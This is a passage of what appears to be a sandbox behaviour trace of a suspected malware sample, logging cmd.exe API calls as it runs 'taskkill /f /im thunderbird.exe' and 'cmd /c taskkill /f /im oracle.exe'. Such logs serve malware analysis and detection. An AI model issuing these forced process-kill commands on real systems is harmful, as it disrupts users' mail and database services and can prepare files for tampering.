returned 13 [0060.712] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.712] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.712] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.712] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.712] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.712] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.712] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.712] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.712] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.712] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.712] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.712] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.712] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.712] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.712] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.712] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.712] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.712] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.712] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.712] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.712] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.713] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.713] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.713] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.713] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.713] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.713] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.713] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.713] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.713] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.713] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.713] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.713] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.713] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.713] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.713] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.713] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.713] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.713] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.713] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.713] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.713] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.713] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.713] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.713] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.713] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.713] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.713] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.713] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.713] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.713] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.713] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.713] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.713] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.713] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.713] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.713] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.714] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.714] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.714] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.714] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.714] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.714] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.714] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.714] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.714] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.714] GetProcessHeap () returned 0x280000 [0060.714] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x210) returned 0x2930b8 [0060.714] GetProcessHeap () returned 0x280000 [0060.714] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4a) returned 0x2932d0 [0060.714] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.714] GetProcessHeap () returned 0x280000 [0060.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x418) returned 0x2807f0 [0060.715] SetErrorMode (uMode=0x0) returned 0x0 [0060.715] SetErrorMode (uMode=0x1) returned 0x0 [0060.715] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2807f8, lpFilePart=0x27f350 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x27f350*="Desktop") returned 0x25 [0060.715] SetErrorMode (uMode=0x0) returned 0x1 [0060.715] GetProcessHeap () returned 0x280000 [0060.715] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2807f0, Size=0x66) returned 0x2807f0 [0060.715] GetProcessHeap () returned 0x280000 [0060.715] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2807f0) returned 0x66 [0060.715] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.715] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.715] GetProcessHeap () returned 0x280000 [0060.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x120) returned 0x293328 [0060.715] GetProcessHeap () returned 0x280000 [0060.715] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x238) returned 0x280860 [0060.721] GetProcessHeap () returned 0x280000 [0060.721] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x280860, Size=0x122) returned 0x280860 [0060.721] GetProcessHeap () returned 0x280000 [0060.721] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x280860) returned 0x122 [0060.721] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.721] GetProcessHeap () returned 0x280000 [0060.721] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe0) returned 0x293450 [0060.721] GetProcessHeap () returned 0x280000 [0060.721] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x293450, Size=0x76) returned 0x293450 [0060.721] GetProcessHeap () returned 0x280000 [0060.721] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x293450) returned 0x76 [0060.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.722] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x27f0cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f0cc) returned 0xffffffff [0060.722] GetLastError () returned 0x2 [0060.722] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x27f0cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f0cc) returned 0xffffffff [0060.722] GetLastError () returned 0x2 [0060.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.722] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x27f0cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f0cc) returned 0x2934d0 [0060.723] GetProcessHeap () returned 0x280000 [0060.723] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x14) returned 0x293510 [0060.723] FindClose (in: hFindFile=0x2934d0 | out: hFindFile=0x2934d0) returned 1 [0060.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x27f0cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f0cc) returned 0xffffffff [0060.723] GetLastError () returned 0x2 [0060.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x27f0cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f0cc) returned 0x2934d0 [0060.723] GetProcessHeap () returned 0x280000 [0060.723] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x293510, Size=0x4) returned 0x293510 [0060.723] FindClose (in: hFindFile=0x2934d0 | out: hFindFile=0x2934d0) returned 1 [0060.723] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.723] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.723] GetConsoleTitleW (in: lpConsoleTitle=0x27f5c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.723] InitializeProcThreadAttributeList (in: lpAttributeList=0x27f44c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x27f514 | out: lpAttributeList=0x27f44c, lpSize=0x27f514) returned 1 [0060.723] UpdateProcThreadAttribute (in: lpAttributeList=0x27f44c, dwFlags=0x0, Attribute=0x60001, lpValue=0x27f50c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x27f44c, lpPreviousValue=0x0) returned 1 [0060.723] GetStartupInfoW (in: lpStartupInfo=0x27f408 | out: lpStartupInfo=0x27f408*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.723] GetProcessHeap () returned 0x280000 [0060.723] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x18) returned 0x2934d0 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.724] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.725] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.725] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.725] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.725] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.725] GetProcessHeap () returned 0x280000 [0060.725] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2934d0 | out: hHeap=0x280000) returned 1 [0060.725] GetProcessHeap () returned 0x280000 [0060.725] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa) returned 0x28ff28 [0060.725] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.726] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im thunderbird.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x27f4a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im thunderbird.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x27f4f4 | out: lpCommandLine="taskkill /f /im thunderbird.exe", lpProcessInformation=0x27f4f4*(hProcess=0x78, hThread=0x74, dwProcessId=0x8d8, dwThreadId=0x648)) returned 1 [0060.973] CloseHandle (hObject=0x74) returned 1 [0060.973] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.973] GetProcessHeap () returned 0x280000 [0060.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295f18 | out: hHeap=0x280000) returned 1 [0060.973] GetEnvironmentStringsW () returned 0x295f18* [0060.973] GetProcessHeap () returned 0x280000 [0060.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb36) returned 0x2940d8 [0060.973] FreeEnvironmentStringsW (penv=0x295f18) returned 1 [0060.973] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0071.015] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x27f3e8 | out: lpExitCode=0x27f3e8*=0x80) returned 1 [0071.015] CloseHandle (hObject=0x78) returned 1 [0071.015] _vsnwprintf (in: _Buffer=0x27f530, _BufferCount=0x13, _Format="%08X", _ArgList=0x27f3f4 | out: _Buffer="00000080") returned 8 [0071.016] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0071.016] GetProcessHeap () returned 0x280000 [0071.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2940d8 | out: hHeap=0x280000) returned 1 [0071.016] GetEnvironmentStringsW () returned 0x2940d8* [0071.016] GetProcessHeap () returned 0x280000 [0071.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb5c) returned 0x2995c0 [0071.016] FreeEnvironmentStringsW (penv=0x2940d8) returned 1 [0071.016] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0071.016] GetProcessHeap () returned 0x280000 [0071.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2995c0 | out: hHeap=0x280000) returned 1 [0071.016] GetEnvironmentStringsW () returned 0x2940d8* [0071.016] GetProcessHeap () returned 0x280000 [0071.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb5c) returned 0x2995c0 [0071.016] FreeEnvironmentStringsW (penv=0x2940d8) returned 1 [0071.016] GetProcessHeap () returned 0x280000 [0071.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x28ff28 | out: hHeap=0x280000) returned 1 [0071.016] DeleteProcThreadAttributeList (in: lpAttributeList=0x27f44c | out: lpAttributeList=0x27f44c) [0071.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.016] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0071.017] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.017] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0071.017] SetConsoleInputExeNameW () returned 0x1 [0071.017] GetConsoleOutputCP () returned 0x1b5 [0071.017] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0071.017] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.018] exit (_Code=128) Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1d24a000" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im oracle.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0xb94 [0060.475] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ff8f4 | out: lpSystemTimeAsFileTime=0x1ff8f4*(dwLowDateTime=0x93fbbd70, dwHighDateTime=0x1d57b18)) [0060.475] GetCurrentProcessId () returned 0xb90 [0060.475] GetCurrentThreadId () returned 0xb94 [0060.475] GetTickCount () returned 0x1149953 [0060.475] QueryPerformanceCounter (in: lpPerformanceCount=0x1ff8ec | out: lpPerformanceCount=0x1ff8ec*=18069720983) returned 1 [0060.477] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0060.477] __set_app_type (_Type=0x1) [0060.477] __p__fmode () returned 0x74eb31f4 [0060.477] __p__commode () returned 0x74eb31fc [0060.477] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.477] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.477] GetCurrentThreadId () returned 0xb94 [0060.477] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb94) returned 0x60 [0060.477] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.477] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.477] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.478] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.478] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ff884 | out: phkResult=0x1ff884*=0x0) returned 0x2 [0060.478] VirtualQuery (in: lpAddress=0x1ff8bb, lpBuffer=0x1ff854, dwLength=0x1c | out: lpBuffer=0x1ff854*(BaseAddress=0x1ff000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.478] VirtualQuery (in: lpAddress=0x100000, lpBuffer=0x1ff854, dwLength=0x1c | out: lpBuffer=0x1ff854*(BaseAddress=0x100000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.478] VirtualQuery (in: lpAddress=0x101000, lpBuffer=0x1ff854, dwLength=0x1c | out: lpBuffer=0x1ff854*(BaseAddress=0x101000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.478] VirtualQuery (in: lpAddress=0x103000, lpBuffer=0x1ff854, dwLength=0x1c | out: lpBuffer=0x1ff854*(BaseAddress=0x103000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.478] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x1ff854, dwLength=0x1c | out: lpBuffer=0x1ff854*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0060.478] GetConsoleOutputCP () returned 0x1b5 [0060.478] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.478] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.478] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.478] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.479] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.479] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.479] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.479] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.479] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.479] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.479] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.479] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.480] GetEnvironmentStringsW () returned 0x412040* [0060.480] GetProcessHeap () returned 0x400000 [0060.480] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xaca) returned 0x412b18 [0060.480] FreeEnvironmentStringsW (penv=0x412040) returned 1 [0060.480] GetProcessHeap () returned 0x400000 [0060.480] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x4) returned 0x410c78 [0060.480] GetEnvironmentStringsW () returned 0x412040* [0060.480] GetProcessHeap () returned 0x400000 [0060.480] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xaca) returned 0x4135f0 [0060.480] FreeEnvironmentStringsW (penv=0x412040) returned 1 [0060.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fe7f4 | out: phkResult=0x1fe7f4*=0x68) returned 0x0 [0060.480] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x0, lpData=0x1fe800*=0x0, lpcbData=0x1fe7f8*=0x1000) returned 0x2 [0060.480] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x1, lpcbData=0x1fe7f8*=0x4) returned 0x0 [0060.480] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x0, lpData=0x1fe800*=0x1, lpcbData=0x1fe7f8*=0x1000) returned 0x2 [0060.480] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x0, lpcbData=0x1fe7f8*=0x4) returned 0x0 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x40, lpcbData=0x1fe7f8*=0x4) returned 0x0 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x40, lpcbData=0x1fe7f8*=0x4) returned 0x0 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x0, lpData=0x1fe800*=0x40, lpcbData=0x1fe7f8*=0x1000) returned 0x2 [0060.481] RegCloseKey (hKey=0x68) returned 0x0 [0060.481] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fe7f4 | out: phkResult=0x1fe7f4*=0x68) returned 0x0 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x0, lpData=0x1fe800*=0x40, lpcbData=0x1fe7f8*=0x1000) returned 0x2 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x1, lpcbData=0x1fe7f8*=0x4) returned 0x0 